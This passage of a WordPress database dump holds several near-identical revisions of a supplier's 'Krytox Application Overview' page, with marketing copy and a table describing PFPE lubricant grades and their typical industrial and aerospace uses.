operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<h3><span style="font-size: 85%;">Krytox Applications by Product:</span></h3>\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-01-10 15:03:28', '2017-01-10 15:03:28', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3424, 2, '2017-01-10 15:05:57', '2017-01-10 15:05:57', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1 style="text-align: center;">Krytox Application Overview</h1>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-01-10 15:05:57', '2017-01-10 15:05:57', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3425, 2, '2017-01-10 15:07:54', '2017-01-10 15:07:54', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h3 style="text-align: center;">Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td 